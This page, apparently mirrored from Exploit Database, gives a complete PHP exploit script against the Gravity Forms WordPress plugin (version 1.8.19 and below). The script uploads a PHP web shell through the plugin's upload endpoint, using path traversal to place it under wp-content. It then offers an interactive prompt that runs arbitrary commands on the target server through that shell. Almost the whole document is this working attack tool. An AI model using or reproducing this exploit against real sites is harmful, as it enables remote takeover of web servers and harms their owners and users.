WordPress Plugin Gravity Forms 1.8.19 – Arbitrary File Upload

• Exploit Database
• 38 阅读

• 作者： Abk Khan
  日期： 2016-06-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39969/

• <?php
  /****************************************************************************************************************************
   *
  	* Exploit Title: Gravity Forms [WP] - Arbitrary File Upload
  	* Vulnerable Version(s): 1.8.19 (and below)
  	* Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
  	* Coded by : Abk Khan [ an0nguy @ protonmail.ch ]
  *
  *****************************************************************************************************************************/
  error_reporting(0);
  
  echo "
   _____ _ _ _______ _ 
  / ____| (_) | |____|| | |
   | |__ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___ 
   | | |_ | '__/ _` \ \ / / | __| | | |__/ _` | | / __|
   | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
  \_____|_|\__,_| \_/ |_|\__|\__, |_|\__,_|_|_|___/
  __/ |
   |___/ > an Exploiter by AnonGuy\n";
  $domain= (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
  $url = "$domain/?gf_page=upload";
  $shell = "$domain/wp-content/_input_3_khan.php5";
  $separator = '-------------------------------------------------------------------';
  
  $ch = curl_init($url);
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  $response = curl_exec($ch);
  curl_close($ch);
  
  if (strpos($response, '"ok"') !== false) {
  echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
  while ($testCom != 'exit') {
  		$user= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
  		$b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
  echo "$user@$b0x:~$ ";
  $handle= fopen("php://stdin", 'r');
  $testCom = trim(fgets($handle));
  fclose($handle);
  $comOut= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
  echo $comOut;
  }
  }
  else {
  	die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
  }
  
  function get_string_between($string, $start, $end)
  {
  # stolen from stackoverflow!
  $string = ' ' . $string;
  $ini= strpos($string, $start);
  if ($ini == 0)
  return '';
  $ini += strlen($start);
  $len = strpos($string, $end, $ini) - $ini;
  return substr($string, $ini, $len);
  }
  ?>